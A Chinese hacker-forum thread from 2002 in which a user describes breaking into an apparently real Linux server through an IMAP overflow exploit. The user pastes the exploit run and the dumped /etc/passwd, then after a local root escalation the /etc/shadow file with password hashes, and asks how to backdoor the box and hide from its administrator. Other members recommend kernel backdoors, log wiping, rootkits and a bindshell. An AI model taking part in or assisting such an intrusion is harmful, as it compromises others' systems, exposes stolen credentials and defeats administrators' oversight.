>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  关于 LINUX 的入侵
发表文章 发表涂鸦
  回复数:8  点击数:245 将此页发给您的朋友        
作者 主题: 关于 LINUX 的入侵 回复 | 收藏 | 打印 | 篇末
renx美女哟
级别:高级站友
威望:0
经验:0
货币:185
体力:8.5
来源:211.158.8.*
总发帖数:162
注册日期:2001-05-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

通过特定版本IMAP可以得到一个shell

溢出是成功了。。当权限好象不够!!

[root@localhost hacker]# ./lsub XXX.XXX.XXX.XXX admin admin 0

Remote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284
Developed by SkyLaZarT - www.BufferOverflow.org

Trying to exploit xxx.xxx.xxx.xxx...
Using return address 0xbffff3ec. Shellcode size: 45 bytes

Connecting... OK
Trying to loging ... OK
Sending shellcode... OK
PRESS ENTER for exploit status!!


uname -a
Linux cickorea 2.2.15-2.5.0ax #1 配 2岿 26 16:32:49 KST 2000 i686 unknown

Exploit Success!!
uid=1003 gid=1001 groups=1001

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2screen.width-300)this.width=screen.width-300'>aemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0screen.width-300)this.width=screen.width-300'>ync:/sbin:/bin/sync
shutdown:x:6:0screen.width-300)this.width=screen.width-300'>hutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0screen.width-300)this.width=screen.width-300'>perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xf
s:x:100:101:X Font Server:/etc/X11/fs:/bin/false
named:x:101:102:Named:/var/named:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
postgres:x:40:233screen.width-300)this.width=screen.width-300'>ostgreSQL Server:/var/lib/pgsql:/bin/bash
cick:x:500:500:cick:/home/cick:/bin/bash
alias:x:501:501::/var/qmail/alias:/bin/bash
qmaild:x:502:501::/var/qmail:/bin/bash
qmaill:x:503:501::/var/qmail:/bin/bash
qmailp:x:504:501::/var/qmail:/bin/bash
qmailq:x:505:502::/var/qmail:/bin/bash
qmailr:x:506:502::/var/qmail:/bin/bash
qmails:x:507:502::/var/qmail:/bin/bash



有没有什么办法提升权限啊

[ 此消息由 renx 在 2002-04-21.16:55:17 编辑过 ]
编辑 删除 发表时间发表于 2002-04-21.16:51:08  MSIE 6.0 Windows XPIP: 已记录
renx美女哟
级别:高级站友
威望:0
经验:0
货币:185
体力:8.5
来源:211.158.8.*
总发帖数:162
注册日期:2001-05-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

好了。。

在用 su.c

再来个本地溢出。。。


id
uid=0(root) gid=0(root) groups=1001

cat shadow
root:$1$hOnnoCqU$Fd8x.xqZqwneV5oofwowT/:11587:0:99999:7:-1:-1:134539268
bin:*:11496:0:99999:7:::
daemon:*:11496:0:99999:7:::
adm:*:11496:0:99999:7:::
lp:*:11496:0:99999:7:::
sync:*:11496:0:99999:7:::
shutdown:*:11496:0:99999:7:::
halt:*:11496:0:99999:7:::
mail:*:11496:0:99999:7:::
news:*:11496:0:99999:7:::
uucp:*:11496:0:99999:7:::
operator:*:11496:0:99999:7:::
games:*:11496:0:99999:7:::
gopher:*:11496:0:99999:7:::
ftp:*:11496:0:99999:7:::
nobody:*:11496:0:99999:7:::
xfs:!!:11496:0:99999:7:::
named:!!:11496
:0:99999:7:::
gdm:!!:11496:0:99999:7:::
postgres:!!:11496:0:99999:7:::
cick:$1$/qE6MABP$NexAmXPAtMj.Xh9jwUzEz/:11496:0:99999:7:-1:-1:134539276
alias:!!:11499:0:99999:7:::
qmaild:!!:11499:0:99999:7:::
qmaill:!!:11499:0:99999:7:::
qmailp:!!:11499:0:99999:7:::
qmailq:!!:11499:0:99999:7:::
qmailr:!!:11499:0:99999:7:::
qmails:!!:11499:0:99999:7:::

成了。。。
编辑 删除 发表时间发表于 2002-04-21.16:53:14  MSIE 6.0 Windows XPIP: 已记录
renx美女哟
级别:高级站友
威望:0
经验:0
货币:185
体力:8.5
来源:211.158.8.*
总发帖数:162
注册日期:2001-05-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

第二次,入侵 LINUX 系统。。不是很熟悉,,请高手指点

1、用什么后门程序最好啊!!

2、怎么隐藏进程,不让管理员发现啊!!
编辑 删除 发表时间发表于 2002-04-21.17:15:34  MSIE 6.0 Windows XPIP: 已记录
我的心以死帅哥哦
级别:一般站友
威望:0
经验:0
货币:165
体力:31.6
来源:浙江
总发帖数:23
注册日期:2002-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

hehe 你到是不怕麻烦还用su
后门??我最喜欢的就是用户后门和内核后门
内核后门2。4。15以上的不好找了
就你入侵的系统sunxkdoor.c是个不错的选择
隐藏进程就相对麻烦点,要用很多的东西不适合初学,
你要先学会擦日志 有几个不错的日志擦除工具可以试试
其实rootkill什么的好多功能都不会用这些都要实践
编辑 删除 发表时间发表于 2002-04-21.17:46:49  MSIE 5.01 Windows 2000IP: 已记录
renx美女哟
级别:高级站友
威望:0
经验:0
货币:185
体力:8.5
来源:211.158.8.*
总发帖数:162
注册日期:2001-05-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

不用 SU 也行啊。。。怎么做啊!!
编辑 删除 发表时间发表于 2002-04-21.17:51:42  MSIE 6.0 Windows XPIP: 已记录
X-Laser帅哥哦
级别:长 老 级
威望:0
经验:0
货币:37
体力:0.5
来源:61.174.128.*
总发帖数:628
注册日期:2002-02-10
查看 邮件 主页 QQ 消息 引用 复制 下载 

bindshell 嘿嘿~~~
编辑 删除 发表时间发表于 2002-04-21.17:56:36  MSIE 5.0 Windows 98IP: 已记录
renx美女哟
级别:高级站友
威望:0
经验:0
货币:185
体力:8.5
来源:211.158.8.*
总发帖数:162
注册日期:2001-05-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

能说详细点吗??
编辑 删除 发表时间发表于 2002-04-21.17:57:47  MSIE 6.0 Windows XPIP: 已记录
X-Laser帅哥哦
级别:长 老 级
威望:0
经验:0
货币:37
体力:0.5
来源:61.174.128.*
总发帖数:628
注册日期:2002-02-10
查看 邮件 主页 QQ 消息 引用 复制 下载 

哦 论坛上不方便说@_@~
编辑 删除 发表时间发表于 2002-04-21.17:59:14  MSIE 5.0 Windows 98IP: 已记录
renx美女哟
级别:高级站友
威望:0
经验:0
货币:185
体力:8.5
来源:211.158.8.*
总发帖数:162
注册日期:2001-05-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

我的 QQ 887516 加我吧!!
编辑 删除 发表时间发表于 2002-04-21.18:01:27  MSIE 6.0 Windows XPIP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符
[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题